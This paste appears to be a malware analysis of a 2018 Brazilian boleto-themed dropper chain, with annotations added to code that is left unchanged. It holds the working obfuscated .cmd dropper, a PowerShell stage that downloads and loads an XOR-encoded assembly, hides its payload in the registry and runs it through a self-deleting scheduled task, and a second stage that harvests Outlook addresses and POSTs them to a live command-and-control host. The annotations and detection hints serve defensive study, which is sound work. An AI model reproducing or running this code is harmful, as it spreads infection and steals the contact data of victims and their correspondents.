James_inthe_box

Client maximus

May 3rd, 2018
  1. https://app.any.run/tasks/db253ae2-2864-479d-a0dd-de0dbfe73796
  2. https://transfer.sh/DsEla/files.7z
  3.  
  4. http://higridis.site/boleto.php -> https://www.dropbox.com/s/7tc757lrqz48ojm/Termo-Acerto_1525379604.zip?dl=1
  5.  
  6. Termo-Acerto_1525379604.cmd:
  7.  
@echo off
REM Termo-Acerto_1525379604.cmd -- obfuscated dropper stage (annotated for analysis; code unchanged).
REM Working directory is set to System32 so the relative WindowsPowerShell path in the
REM final echo line resolves.
cd %SystemRoot%\System32
REM fTP is a 62-character lookup table assembled four characters at a time. Every later
REM substring pick (fTP:~index,1) selects one character from it; the split assignments only
REM serve to defeat simple string signatures on the .cmd, they carry no logic of their own.
set fTP=
Set fTP=%fTP%Cq2a
Set fTP=%fTP%SiK7
Set fTP=%fTP%rmhc
Set fTP=%fTP%zXwB
Set fTP=%fTP%8yIM
Set fTP=%fTP%1uYj
Set fTP=%fTP%Je6k
Set fTP=%fTP%G0fO
Set fTP=%fTP%dtsF
Set fTP=%fTP%5gPv
Set fTP=%fTP%VQE3
Set fTP=%fTP%4oWT
Set fTP=%fTP%DUZ9
Set fTP=%fTP%nlLx
Set fTP=%fTP%pHAb
Set fTP=%fTP%RN
REM aa holds an escaped pipe character so the echo below can emit a literal pipe.
set aa=^|
REM data is assembled one character at a time. Resolving the picks against fTP (done by the
REM reviewer) yields a mixed-case IEX(New-Object Net.WebClient).DownloadString('https://dlm.nadolt.com/?...')
REM one-liner, i.e. a download-and-execute of the 1st stage shown further down. The random
REM letter casing is anti-signature noise and has no effect in PowerShell.
set data=
Set data=%data%%fTP:~5,1%%fTP:~42,1%%fTP:~13,1%("%fTP:~18,1%%fTP:~42,1%%fTP:~55,1%(%fTP:~61,1%%fTP:~25,1%
Set data=%data%%fTP:~46,1%-%fTP:~45,1%%fTP:~59,1%%fTP:~24,1%%fTP:~25,1%%fTP:~11,1%%fTP:~47,1% %fTP:~61,1%%fTP:~25,1%
Set data=%data%%fTP:~47,1%.%fTP:~14,1%%fTP:~42,1%%fTP:~15,1%%fTP:~11,1%%fTP:~54,1%%fTP:~18,1%%fTP:~25,1%%fTP:~52,1%%fTP:~33,1%
Set data=%data%).%fTP:~32,1%%fTP:~31,1%%fTP:~46,1%%fTP:~52,1%%fTP:~54,1%%fTP:~31,1%%fTP:~3,1%%fTP:~48,1%%fTP:~34,1%
Set data=%data%%fTP:~47,1%%fTP:~8,1%%fTP:~5,1%%fTP:~52,1%%fTP:~28,1%('%fTP:~10,1%%fTP:~33,1%%fTP:~33,1%
Set data=%data%%fTP:~56,1%%fTP:~34,1%://%fTP:~32,1%%fTP:~53,1%%fTP:~9,1%.%fTP:~52,1%%fTP:~3,1%
Set data=%data%%fTP:~32,1%%fTP:~45,1%%fTP:~53,1%%fTP:~33,1%.%fTP:~11,1%%fTP:~45,1%%fTP:~9,1%/?%fTP:~32,1%
Set data=%data%%fTP:~9,1%%fTP:~24,1%%fTP:~5,1%%fTP:~21,1%%fTP:~58,1%%fTP:~3,1%%fTP:~28,1%%fTP:~22,1%%fTP:~26,1%%fTP:~42,1%%fTP:~0,1%
Set data=%data%%fTP:~51,1%%fTP:~50,1%%fTP:~33,1%%fTP:~15,1%%fTP:~25,1%%fTP:~16,1%%fTP:~56,1%%fTP:~6,1%%fTP:~47,1%%fTP:~19,1%%fTP:~0,1%
Set data=%data%%fTP:~4,1%%fTP:~37,1%%fTP:~56,1%%fTP:~60,1%%fTP:~25,1%%fTP:~40,1%%fTP:~13,1%%fTP:~53,1%%fTP:~3,1%%fTP:~20,1%%fTP:~54,1%
Set data=%data%%fTP:~48,1%%fTP:~56,1%%fTP:~22,1%%fTP:~52,1%%fTP:~14,1%%fTP:~36,1%%fTP:~32,1%%fTP:~13,1%%fTP:~30,1%%fTP:~34,1%%fTP:~0,1%
Set data=%data%%fTP:~18,1%%fTP:~54,1%%fTP:~13,1%%fTP:~3,1%%fTP:~43,1%%fTP:~35,1%%fTP:~23,1%%fTP:~55,1%%fTP:~60,1%%fTP:~49,1%%fTP:~23,1%
Set data=%data%%fTP:~32,1%%fTP:~23,1%%fTP:~34,1%%fTP:~17,1%%fTP:~60,1%%fTP:~31,1%%fTP:~4,1%%fTP:~34,1%%fTP:~31,1%%fTP:~4,1%%fTP:~31,1%
Set data=%data%%fTP:~1,1%%fTP:~23,1%%fTP:~8,1%%fTP:~23,1%%fTP:~59,1%%fTP:~31,1%%fTP:~46,1%%fTP:~21,1%%fTP:~8,1%%fTP:~54,1%%fTP:~61,1%
Set data=%data%%fTP:~47,1%%fTP:~39,1%%fTP:~18,1%%fTP:~28,1%%fTP:~58,1%%fTP:~3,1%%fTP:~58,1%%fTP:~45,1%%fTP:~40,1%%fTP:~14,1%%fTP:~43,1%
Set data=%data%%fTP:~27,1%%fTP:~48,1%%fTP:~16,1%%fTP:~2,1%/%fTP:~46,1%%fTP:~8,1%%fTP:~18,1%%fTP:~38,1%%fTP:~58,1%%fTP:~59,1%
Set data=%data%%fTP:~43,1%%fTP:~40,1%%fTP:~50,1%%fTP:~9,1%%fTP:~48,1%%fTP:~50,1%%fTP:~3,1%/%fTP:~5,1%%fTP:~58,1%%fTP:~51,1%
Set data=%data%%fTP:~36,1%')");
REM The picks in the echo line resolve to WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -
REM preceded by the pipe from aa; the doubled percent signs around data survive as single ones
REM inside a .cmd. The line is cut off at the end of the paste, so how the echoed text is
REM handed to an interpreter is not visible here. Detection hook: cmd.exe started from a
REM user-writable .cmd spawning powershell.exe with the -nop and -win 1 switches.
echo %%data%%%aa%%fTP:~46,1%%fTP:~5,1%%fTP:~52,1%%fTP:~32,1%%fTP:~45,1%%fTP:~14,1%%fTP:~34,1%%fTP:~38,1%%fTP:~45,1%%fTP:~14,1%%fTP:~25,1%%fTP:~8,1%%fTP:~4,1%%fTP:~10,1%%fTP:~25,1%%fTP:~53,1%%fTP:~53,1%\%fTP:~39,1%%fTP:~20,1%.%fTP:~29,1%\%fTP:~56,1%%fTP:~45,1%%fTP:~14,1%%fTP:~25,1%%fTP:~8,1%%fTP:~34,1%%fTP:~10,1%%fTP:~25,1%%fTP:~53,1%%fTP:~53,1%.%fTP:~25,1%%fTP:~55,1%%fTP:~25,1% -%fTP:~52,1%%fTP:~45,1%%fTP:~56,1% -%fTP:~14,1%%fTP:~5,1%%fTP:~52,1% %fTP:~20,1% -
  48.  
  49. 1st stage:
  50.  
# 1st stage (annotated for analysis; code unchanged). Downloaded and IEX'd by the .cmd above.
# Run-once-per-day guard: an empty marker file named after today's date (yyyyMMdd) in %TEMP%.
# Everything below is skipped when that file already exists, so its presence is a host artefact.
$fileName = "$env:TEMP\$([System.DateTime]::Now.ToString('yyyyMMdd'))"
$bExists = [System.IO.File]::Exists($fileName)

if (-Not $bExists) {
"" | Set-Content $fileName

# Fetches a blob from dlm.nadolt.com and decodes it with a single-byte XOR (key 0x6A).
$bytes = (New-Object Net.WebClient).DownloadData("https://dlm.nadolt.com/?dmNvsQSFZqUA8ptBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbOWurLMjuHl4AB6tr3Eb//fWEH/0b3Vc1B8S+3gx5")

for($i=0; $i -lt $bytes.count; $i++) {
$bytes[$i] = $bytes[$i] -bxor 0x6A
}

# In-memory load of the decoded .NET assembly; it never touches disk, so the place to catch it
# is PowerShell script block logging (event 4104) or an AMSI hook, not a file scan.
# The assembly exposes the [Loader] type used from here on.
[Reflection.Assembly]::Load($bytes)

# [Loader] members are known only by name here (randomInt, RandomString, Go3, outDir);
# their actual behaviour has to be confirmed from the decoded assembly.
$rInt = [Loader]::randomInt(4, 16)
$prefix = "$([Loader]::RandomString($rInt))-"

# Go3 gets the C2 base URL, four opaque strings and the random prefix. Judging by the
# launcher .cmd generated below it presumably stages the next payload in the registry under
# HKCU\Software\Microsoft as values whose names start with $prefix -- TODO confirm in the assembly.
[Loader]::Go3("https://dlm.nadolt.com","dmBkvwaGaqEA9JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrh0b7oqGxFKsXkFNmDJY=","dmFlsQGAZacF95tBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrwGzs2KWxQfwfmFE0BZU=","dWRiuwGCYKdOoZ5uaslIatKzrpM7UgxV6Lz7bmE0QXHGC4HxaEtS0jo3UiQSRPqoPSGqi7rzFHiAN87dMGYAAZ9D80Ls2/L9TLFDxwE2AJHv2Q==","dWFksACDZ6UF9JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrwG3Ry6yEH/0b3VE2BZC/3A56",$prefix)

# Random batch variable names so the generated launcher has no stable strings to signature.
$var1 = [Loader]::RandomString($rInt)
$var2 = [Loader]::RandomString($rInt)
$var3 = [Loader]::RandomString($rInt)

# Launcher .cmd with a random name, written into [Loader]::outDir (path not visible here).
$cmdFileName = "$([Loader]::outDir)\$([Loader]::RandomString([Loader]::randomInt(6, 16))).cmd"

# The launcher runs REG QUERY over HKCU\Software\Microsoft, keeps the data (token 3) of every
# value whose name (token 1) starts with $prefix, concatenates it into $var2 and finally executes
# the result via the bare "%$var2%" line. The payload therefore lives in the registry, and the
# .cmd on disk contains neither payload nor C2 string. The literal 1 appended to %%1 looks like a
# guard against an empty value name in the compare -- unverified.
$cmdSource = "@Echo off`r`n"
$cmdSource += "Setlocal EnableExtensions`r`n"
$cmdSource += "Setlocal EnableDelayedExpansion`r`n"
$cmdSource += "Set $var1=HKCU`r`n"
$cmdSource += "Set $var1=%$var1%\Software`r`n"
$cmdSource += "Set $var1=%$var1%\Microsoft`r`n"
$cmdSource += "Set $var2=`r`n"
$cmdSource += "FOR /F `"usebackq tokens=1,2*`" %%1 IN (``REG QUERY %$var1%``) DO (`r`n"
$cmdSource += "Set $var3=%%11`r`n"
$cmdSource += "IF `"!$var3`:~0,$($prefix.Length)!`"==`"$prefix`" (`r`n"
$cmdSource += "Set $var2=!$var2!%%3`r`n"
$cmdSource += ")`r`n"
$cmdSource += ")`r`n"
$cmdSource += "%$var2%`r`n"
$cmdSource | Set-Content $cmdFileName

# Shortcut named after the current user pointing at the launcher, window style 7 (minimised).
# Whether this .lnk doubles as a persistence entry depends on what outDir is -- confirm.
$lnkFileName = "$([Loader]::outDir)\$env:USERNAME.lnk"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($lnkFilename)
$Shortcut.TargetPath = $cmdFileName
$Shortcut.WindowStyle = 7
$Shortcut.Save()

# One-shot scheduled task: fires 5 s from now and is only valid for 30 s.
$TaskStartTime = [datetime]::Now.AddSeconds(5)
$TaskEndTime = [datetime]::Now.AddSeconds(35)

$taskName = [Loader]::RandomString($rInt)

$service = New-Object -ComObject("Schedule.Service")
$service.Connect()

$rootFolder = $service.GetFolder("\")

# DeleteExpiredTaskAfter = PT0M makes the scheduler drop the task as soon as the end boundary
# passes; together with the schtasks /Delete action below the task is cleaned up twice.
$TaskDefinition = $service.NewTask(0)
$TaskDefinition.RegistrationInfo.Description = ""
$TaskDefinition.Settings.Enabled = $true
$TaskDefinition.Settings.DisallowStartIfOnBatteries = $false
$TaskDefinition.Settings.DeleteExpiredTaskAfter = "PT0M"

# Trigger type 1 is a time trigger (TASK_TRIGGER_TIME).
$triggers = $TaskDefinition.Triggers
$trigger = $triggers.Create(1)
$trigger.StartBoundary = $TaskStartTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
$trigger.EndBoundary = $TaskEndTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
$trigger.Enabled = $true

# Action type 0 is an exec action (TASK_ACTION_EXEC): first the launcher .cmd ...
$action = $TaskDefinition.Actions.Create(0)
$action.Path = $cmdFileName
$action.Arguments = ""

# ... then the task deletes itself by name.
$action = $TaskDefinition.Actions.Create(0)
$action.Path = "schtasks.exe"
$action.Arguments = "/Delete /F /TN $taskName"

# Flag 6 is TASK_CREATE_OR_UPDATE, logon type 0. A random-named task created and deleted within
# a minute shows up as a 4698 immediately followed by a 4699 in the Security log.
$rootFolder.RegisterTaskDefinition($taskName, $TaskDefinition, 6, "", $null, 0)

# $urlPL is not used in this stage: the 2nd stage IEX'd on the next line POSTs its harvested
# address list to it.
$urlPL = "https://dlm.nadolt.com/?dmRlsQKLZasK8JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbIVOwT9TuamdZH69NzWvW2++EHJxP7gpNXcDdhQRgMAEFpAYlS6o="
IEX(New-Object Net.WebClient).DownloadString("https://dlm.nadolt.com/?dmVjuw2Aa6ID9ZtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbIVOwT83WAXs4HpFoxEb4w/WCGIRPxzI5Cdq83F0tMARSpw==")
}
  134.  
  135. 2nd stage:
# 2nd stage (annotated for analysis; code unchanged): Outlook address-book harvester, IEX'd by
# the 1st stage. Identifiers are built from slashes, backslashes and equals signs and short
# strings are hidden as base64 of UTF-16; the Add-Type argument decodes to
# Microsoft.Office.Interop.Outlook.
Add-Type -assembly $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAGMAcgBvAHMAbwBmAHQALgBPAGYAZgBpAGMAZQAuAEkAbgB0AGUAcgBvAHAALgBPAHUAdABsAG8AbwBrAA==')))
# Outlook COM automation object and its MAPI namespace ('TQBBAFAASQA=' decodes to MAPI).
# powershell.exe instantiating Outlook.Application is the behavioural tell for this stage.
${_/=\/\__/=\/\/\__} = New-Object -comobject Outlook.Application
${____/===\_____/\/} = ${_/=\/\__/=\/\/\__}.GetNameSpace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBBAFAASQA='))))
# Accumulator for the de-duplicated, lower-cased addresses collected by the functions below.
${_/\/=====\__/=\/=} = [System.Collections.ArrayList]@()
function ___/=\/\/=\___/=\_(${____/\____/\/\_/\_})
{
# Returns $true when the argument looks like an e-mail address. The base64 blob decodes to
# ^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$ (decoded by the reviewer),
# which only accepts lower-case input -- hence the ToLower() in the caller.
${____/==\__/\_/=\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XgBbAF8AYQAtAHoAMAAtADkALQBdACsAKABcAC4AWwBfAGEALQB6ADAALQA5AC0AXQArACkAKgBAAFsAYQAtAHoAMAAtADkALQBdACsAKABcAC4AWwBhAC0AegAwAC0AOQAtAF0AKwApACoAKABcAC4AWwBhAC0AegBdAHsAMgAsADQAfQApACQA')));
if (${____/\____/\/\_/\_} -match ${____/==\__/\_/=\_}) {
return $true
}
return $false
}
function _/=\_/==\____/\__/(${____/\____/\/\_/\_}) {
# Normalises one candidate address and appends it to the global list if it is valid and new.
# Empty / null input is ignored.
if (${____/\____/\/\_/\_}) {
${__/=====\/\_/\_/\} = $false
# Lower-case, then strip a surrounding pair of single quotes (as seen in some display names).
${____/\____/\/\_/\_} = ${____/\____/\/\_/\_}.ToLower()
if (${____/\____/\/\_/\_}.StartsWith("'") -And ${____/\____/\/\_/\_}.EndsWith("'")) {
${____/\____/\/\_/\_} = ${____/\____/\/\_/\_}.Substring(1, ${____/\____/\/\_/\_}.Length - 2)
}
if (___/=\/\/=\___/=\_(${____/\____/\/\_/\_})) {
# Linear duplicate check against everything collected so far.
for(${__/\/\__/=\/\__/\} = 0;${__/\/\__/=\/\__/\} -lt ${_/\/=====\__/=\/=}.Count;${__/\/\__/=\/\__/\}++) {
if (${_/\/=====\__/=\/=}[${__/\/\__/=\/\__/\}] -eq ${____/\____/\/\_/\_}) {
${__/=====\/\_/\_/\} = $true
break
}
}
if (-Not ${__/=====\/\_/\_/\}) {
# ArrayList.Add returns the new index; assigning it keeps it off the pipeline output.
${__/\___/========\} = ${_/\/=====\__/=\/=}.Add(${____/\____/\/\_/\_})
}
}
}
}
function _/====\__/=====\_/ {
# Walks every address list exposed by the MAPI namespace (address books such as Contacts and,
# on Exchange, the GAL) and feeds each entry's address to the collector.
${/==\/=\____/\_/=\} = ${____/===\_____/\/}.AddressLists
for(${__/\/\__/=\/\__/\} = 1;${__/\/\__/=\/\__/\} -le ${/==\/=\____/\_/=\}.Count;${__/\/\__/=\/\__/\}++) {
${/=\_/==\/\__/==\_} = ${/==\/=\____/\_/=\}.Item(${__/\/\__/=\/\__/\}).AddressEntries
for(${/==\/\/\_/\_/\__/} = 1;${/==\/\/\_/\_/\__/} -le ${/=\_/==\/\__/==\_}.Count;${/==\/\/\_/\_/\__/}++) {
${_/\_/\__/\_____/=} = ${/=\_/==\/\__/==\_}.Item(${/==\/\/\_/\_/\__/})
${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
${____/\____/\/\_/\_} = ""
# Type 10 entries expose the address directly; types 0-5 are resolved through the Exchange
# user object. The numbers appear to be OlAddressEntryUserType values (10 = Outlook contact,
# 0-5 = Exchange user/list/folder/agent/organization/remote user) -- verify against the enum.
if (${__/===\/===\/\/\_} -eq 10) {
${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
} elseif ((${__/===\/===\/\/\_} -eq 3) -Or (${__/===\/===\/\/\_} -eq 1) -Or (${__/===\/===\/\/\_} -eq 4) -Or (${__/===\/===\/\/\_} -eq 2) -Or (${__/===\/===\/\/\_} -eq 5) -Or (${__/===\/===\/\/\_} -eq 0)) {
${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
}
_/=\_/==\____/\__/(${____/\____/\/\_/\_})
}
}
}
function __/\/\__/\_/===\_/(${___/\/==\_/==\/=\/}) {
# Recursively walks a Folders collection. For every item in every folder it collects the
# addresses of all recipients and of the sender, then descends into the sub-folders.
# Items is not filtered by message class, so non-mail items are visited too; what Recipients
# and Sender return for those is not visible here.
for(${__/\/\__/=\/\__/\} = 1;${__/\/\__/=\/\__/\} -le ${___/\/==\_/==\/=\/}.Count;${__/\/\__/=\/\__/\}++) {
${_/======\_/=\/=\_} = ${___/\/==\_/==\/=\/}.Item(${__/\/\__/=\/\__/\})
${__/\/=\___/\_/==\} = ${_/======\_/=\/=\_}.Items
for(${/==\/\/\_/\_/\__/} = 1;${/==\/\/\_/\_/\__/} -le ${__/\/=\___/\_/==\}.Count;${/==\/\/\_/\_/\__/}++) {
${_/==\_____/==\__/} = ${__/\/=\___/\_/==\}.Item(${/==\/\/\_/\_/\__/})
${/=\/====\____/=\/} = ${_/==\_____/==\__/}.Recipients
# Recipients: type 0 resolved via the Exchange user, types 30 and 10 taken verbatim
# (presumably LDAP and Outlook-contact entries -- verify against OlAddressEntryUserType).
for(${_/\_/\__/\/\_/=\_} = 1;${_/\_/\__/\/\_/=\_} -le ${/=\/====\____/=\/}.Count;${_/\_/\__/\/\_/=\_}++) {
${__/\_/\__/=\/\_/\} = ${/=\/====\____/=\/}.Item(${_/\_/\__/\/\_/=\_})
${_/\_/\__/\_____/=} = ${__/\_/\__/=\/\_/\}.AddressEntry
${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
${____/\____/\/\_/\_} = "";
if (${__/===\/===\/\/\_} -eq 0) {
${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
} elseif ((${__/===\/===\/\/\_} -eq 30) -Or (${__/===\/===\/\/\_} -eq 10)) {
${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
}
_/=\_/==\____/\__/(${____/\____/\/\_/\_})
}
# Sender of the item, same type handling as for recipients.
${_/\_/\__/\_____/=} = ${_/==\_____/==\__/}.Sender
${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
${____/\____/\/\_/\_} = "";
if (${__/===\/===\/\/\_} -eq 0) {
${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
} elseif ((${__/===\/===\/\/\_} -eq 30) -Or (${__/===\/===\/\/\_} -eq 10)) {
${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
}
_/=\_/==\____/\__/(${____/\____/\/\_/\_})
}
# Recurse into sub-folders.
__/\/\__/\_/===\_/(${_/======\_/=\/=\_}.Folders)
}
}
function ____/=\_/\_/==\/==() {
# Orchestrates the harvest: address books first, then every folder of the mailbox, then
# releases the Outlook COM object and posts the result to the C2.
_/====\__/=====\_/
__/\/\__/\_/===\_/(${____/===\_____/\/}.Folders)
${/\_____/\_/\/==\/} = [System.Runtime.Interopservices.Marshal]::ReleaseComObject(${_/=\/\__/=\/\/\__})
# $urlPL is not defined in this stage; it is set by the 1st stage before this script is IEX'd.
${_/\__/\/\/\_/\/=\} = [System.Net.WebRequest]::Create($urlPL)
# Exfil body is "list=" followed by the addresses joined with ';' (no URL-encoding applied).
${/=\___/==\/=\__/=} = [System.Text.Encoding]::UTF8.GetBytes("list=$(${_/\/=====\__/=\/=} -join ';')")
# The two base64 blobs decode to POST and application/x-www-form-urlencoded.
# Network tell: a POST from powershell.exe to dlm.nadolt.com whose body starts with list=.
${_/\__/\/\/\_/\/=\}.Method = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABPAFMAVAA=')))
${_/\__/\/\/\_/\/=\}.ContentType = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AeAAtAHcAdwB3AC0AZgBvAHIAbQAtAHUAcgBsAGUAbgBjAG8AZABlAGQA')))
${_/\__/\/\/\_/\/=\}.ContentLength = ${/=\___/==\/=\__/=}.length
${___/=\_/\/\/=\___} = ${_/\__/\/\/\_/\/=\}.GetRequestStream()
${___/=\_/\/\/=\___}.Write(${/=\___/==\/=\__/=}, 0, ${/=\___/==\/=\__/=}.length)
${___/=\_/\/\/=\___}.Close()
# The response is fetched but never read.
[System.Net.WebResponse] ${/===\/=\____/\/=\} = ${_/\__/\/\/\_/\/=\}.GetResponse()
}
function _/=\/\/\_/\____/=\() {
# Run-once guard for the harvester. The base64 blob decodes to $env:APPDATA\Microsoft\.Outlook;
# ExpandString resolves the $env: reference at run time. That empty marker file is a
# host artefact of this stage.
${__/======\____/\_} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAGkAYwByAG8AcwBvAGYAdABcAC4ATwB1AHQAbABvAG8AawA=')))
${__/==\/\__/\/===\} = [System.IO.File]::Exists(${__/======\____/\_})
if (-Not ${__/==\/\__/\/===\}) {
# sc is the Set-Content alias: creates the marker, then harvests and exfiltrates once.
"" | sc ${__/======\____/\_}
____/=\_/\_/==\/==
}
}
# Entry point of the 2nd stage.
_/=\/\/\_/\____/=\